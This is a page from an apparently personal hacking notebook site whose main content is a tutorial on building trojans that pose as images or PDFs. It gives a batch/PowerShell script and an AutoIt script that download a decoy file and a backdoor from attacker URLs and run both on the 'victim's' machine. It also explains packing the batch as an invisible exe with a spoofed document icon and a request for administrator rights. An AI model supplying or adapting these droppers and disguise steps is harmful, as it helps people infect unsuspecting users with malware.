Hackzzz - The Notebook
  • โšกWelcome!
    • ๐Ÿ‘พHackzzz
    • ๐Ÿ“Writeups
      • HackTheBox
        • ๐ŸงLinux
          • Lame
          • Squashed
          • Faculty
        • ๐ŸชŸWindows
          • Jeeves
          • Bart
          • Active
          • Tally
      • Portswigger
        • ๐Ÿ“‚File upload
          • Apprentice
            • Remote code execution via web shell upload
            • Web shell upload via Content-Type restriction bypass
        • ๐Ÿ’‰SQL Injection
          • Apprentice
            • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
            • SQL injection vulnerability allowing login bypass
          • Practioner
            • SQL injection UNION attack, determining the number of columns returned by the query
            • SQL injection UNION attack, finding a column containing text
            • SQL injection UNION attack, retrieving data from other tables
            • SQL injection UNION attack, retrieving multiple values in a single column
            • SQL injection attack, querying the database type and version on Oracle
            • SQL injection attack, querying the database type and version on MySQL and Microsoft
            • SQL injection attack, listing the database contents on non-Oracle databases
            • SQL injection attack, listing the database contents on Oracle
            • Blind SQL injection with conditional responses
            • Blind SQL injection with time delays
            • Blind SQL injection with time delays and information retrieval
        • ๐Ÿ“‘Information Disclosure
          • Apprentice
            • Error Messages
            • Filtering a debug page
            • Backup Leakage
            • Authentication bypass via information disclosure
          • Practitioner
            • Information disclosure in version control history
        • ๐ŸชœDirectory Traversal
          • Apprentice
            • File path traversal, simple case
          • Practioner
            • File path traversal, traversal sequences blocked with absolute path bypass
            • File path traversal, traversal sequences stripped non-recursively
            • File path traversal, traversal sequences stripped with superfluous URL-decode
            • File path traversal, validation of file extension with null byte bypass
        • ๐Ÿง‘โ€๐Ÿ’ปOS Command Injection
          • Apprentice
            • OS command injection, simple case
          • Practioner
            • Blind OS command injection with time delays
            • Blind OS command injection with output redirection
        • ๐ŸงƒBroken Authentication
          • Apprentice
            • Username enumeration via different responses
            • 2FA simple bypass
            • Password reset broken logic
        • ๐Ÿ—ƒ๏ธAccess Control
          • Apprentice
            • Unprotected admin functionality
            • Unprotected admin functionality with unpredictable URL
            • User role controlled by request parameter
            • User role can be modified in user profile
            • User ID controlled by request parameter
            • User ID controlled by request parameter, with unpredictable user IDs
            • User ID controlled by request parameter with data leakage in redirect
            • User ID controlled by request parameter with password disclosure
            • Insecure Direct Object References (IDOR)
        • ๐Ÿ“External Entity Injection
          • Apprentice
      • TryHackme
        • ๐ŸงLinux
        • ๐ŸชŸWindows
          • Crocc Crew
          • Enterprise
    • ๐Ÿ”ฎGithub
    • ๐Ÿ“บYouTube Channel
  • Everything About and Notes
    • ๐ŸฅทFive stages of Ethical Hacking
    • ๐Ÿ”OSINT
      • ๐Ÿ•ต๏ธInformation Gathering Methodologies
        • Information Gathering
        • OSINT Employee's
        • Automate OSINT techniques
          • Sherlock
          • PhoneInfoga
          • Osintgram
          • twint
          • Userrecon
      • Discovering Email Address
      • Breach Credentials
      • Reverse Image Searching
      • Hunting Usernames & Accounts
      • Searching People
      • Phone Numbers
      • Google Dorks
      • Search Engines
      • Default Passwords
      • Aircraft Tracking
      • Car OSINT
      • Wi-Fi OSINT
      • OSINT Virtual Machine
    • ๐Ÿ‘๏ธNetwork Pentesting
      • MITM Cheatsheet
      • Host Discovery
      • Scanning Hosts
      • Sniffing
      • Spoofing
      • DNS spoofing + apache2
      • Firewall/IDS Evasion
      • ๐Ÿ–จ๏ธPrinter Hacking
      • ๐Ÿ‘๏ธโ€๐Ÿ—จ๏ธIoT Pentesting
    • ๐ŸชŸWindows and Active Directory
      • Windows Basic Commands
        • Network Command's
        • Tasks
        • Computer Slow Command's
        • Bypass Windows Admin Prompt
      • Active Directory
        • AD Enumeration
        • Man-In-The-Middle Attacks
          • SMB Relay
          • LLMNR Poisoning
        • Zerologon (2020-1472)
        • Password Cracking
        • Kerberoasting
          • Kerbrute
          • ASREP Roasting
        • Post-Compromise Enumeration
          • Powerview
          • Bloodhound
            • Installing & Setting Up
            • SharpHound
            • Using BloodHound
        • Post-Compromise attacks
          • Privilege Escalation
            • Token Impersonation
            • Print Nightmare (CVE-2021-1675)
          • Pass Attacks
            • Pass the Hash
            • Pass the Password
            • GPP cPassword Attack
          • Mimikatz
            • Golden Ticket Attack
          • Dumping hashes (secretsdump)
      • Windows Privilege Escalation
        • Unquoted Path Service
        • Abusing the Golden Privileges
        • Print Spoofer
        • Print-Nightmare
        • Rogue Potato
      • Active Directory Exploitation Cheat Sheet
      • Active Directory Attacks (PayloadAllTheThings)
    • ๐Ÿง Social Engineering
      • Windows Malware
        • Generating Undetectable backdoors
        • Bypassing Anti-Virus by modifying Hex Value
        • Creating Trojans
          • Embedding malicious files in Images or PDF
          • Changing Trojans Icon
          • Spoofing file extensions
          • Microsoft Office Trojans
            • Word Macros
      • OS X Malware
        • Using Msfvenom
      • Linux Malware
        • Simple Backdoors
        • Embedding Evil Code in a Legitimate Linux Package
        • Backdooring An APK
      • Spying Software
      • Delivery methods
        • Gophish
        • Spoofing Emails
          • Setting Your Own SMTP server
        • Creating Fake Login Website
        • Manipulating URL's
      • Make attacks outside the network
        • Ngrok
      • Social Engineering
      • Social Engineering by Cristopher hadnagy
    • ๐Ÿ•ธ๏ธWeb Pentesting
      • Web Basics
      • Information Gathering - Some One-liners
      • File Upload
      • Code Execution
      • Local File Inclusion
      • SQL Injection
      • XSS (Corss-site scripting)
      • CSRF (Cross-site requests forgery)
      • Discovering Vulnerabilities using OWASP ZAP
      • CMS
        • Wpscan
      • ๐Ÿ•ท๏ธOWASP Testing Guide
      • ๐Ÿ“’Bug Bounty Checklist
    • ๐Ÿ“กWireless Pentesting
      • Wi-Fi Network Fundamentals
        • Basic Terminologies and Concepts
      • De-authentication
      • Disassociation Packets
      • Beacon Flooding
      • Authentication Denial-Of-Service
      • SSID Probing and Bruteforcing
      • EAPOL Start and Logoff Packet Injection
      • Attacks for IEEE 802.11s mesh networks
      • WIDS Confusion
      • WEP
        • Caffe-Latte
      • WPA/WPA2 - PSK
        • Handshake Capture
        • WPA Cracking
        • Resources
      • Evil Twin Attacks
        • WifiPumpkin3
          • Creating a fake access point
          • Using captive portal attack
          • Pulp scripts
      • WI-FI Pentesting Guide
      • Wifi Hacking Using Windows CMD
    • ๐Ÿ”ฅBinary Explotation
      • Assembly for Reverse Engineering
      • Reversing
    • ๐Ÿƒโ€โ™‚๏ธPivoting & Port-forwarding
      • Chisel
      • SSH
      • Socat
      • plink
      • sshuttle
      • Pivoting Bash Scripts
    • ๐Ÿ“ฑMobile Application Pentesting
      • Android Hacking Methodology
      • Mobile Application CheatSheet
      • Android Penetration Testing
    • ๐ŸฆพArduino
    • ๐ŸŒExternal Pentesting
      • External Pentesting
  • Gadgets
    • ๐Ÿ“‡Proxmark3
      • Attacking MIFARE Classic 1KB
    • ๐Ÿ“กSDR Hacking
      • Hardware
      • Using RTL-SDR
      • DragonOS
    • ๐ŸWI-FI Pineapple
      • Evil Portals
  • ๐ŸšฉResources
    • ๐Ÿ™Extras
      • Drone Hacking
      • Password Cracking with Rules and Munging
      • Game Hacking
      • Carding
      • Personal Security Checklist
    • ๐ŸŸฆMetasploit
      • Metasploit Modules
    • rc Personal Config (.bashrc && .zshrc)
    • WADCOMS
    • GTFOBins
    • LOLBAS
    • Devhints
    • Weakpass
    • Revshells
    • ๐Ÿ“‘Pentesting Reports Repo
Powered by GitBook
On this page
  • Embedding Files using batch (First Method)
  • Embedding Files using Autoit (Second Method)
  • Converting Bat to exe
  • Installation
  • Usage
  1. Everything About and Notes
  2. Social Engineering
  3. Windows Malware
  4. Creating Trojans

Embedding malicious files in Images or PDF

Embedding Files using batch (First Method)

@echo off

set files='pdf/image_url','url_of_our_evil_file/Backdoor_URL'

powershell "(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
  • Using the following batch script following by the URL's order and delivering to the victim we will see that when the victim opens this file, the pdf/image will pop up first and the evil program will be executed after.

Embedding Files using Autoit (Second Method)

#include <StaticConstants.au3>
#include <WindowsConstants.au3>

Local $urls = "image_URL,Backdoor_URL"

Local $urlsArray = StringSplit($urls, ",", 2 )

For $url In $urlsArray
	$sFile = _DownloadFile($url)
	shellExecute($sFile)

Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage
  • Use this script and add all the malicious links you want.

  • Once this its compile, when the victims execute the file, it will execute at the same time all the files.

  • This does the same that the first method does but without using batch and uploading straight the icon of the program in the autoit program.

Converting Bat to exe

Installation

  • Use wine to execute the program in Linux, you can use it in windows as well.

sudo apt update
sudo apt upgrade
git clone https://github.com/tokyoneon/B2E
cd B2E
unzip Bat_To_Exe_Converter.zip
wine  Bat_To_Exe_Converter_\(Installer\).exe

Usage

  • Always select one of the invisible options (Windows 64 bits invisible).

  • You can click on Requests Administrator privileges to get access with admin privileges.

  • The Icon option lets you set an Icon to your evil file like pdf, word, etc.

PreviousCreating TrojansNextChanging Trojans Icon

Last updated 2 years ago

๐Ÿง 
B2E/Bat_To_Exe_Converter.zip at master ยท tokyoneon/B2EGitHub
Logo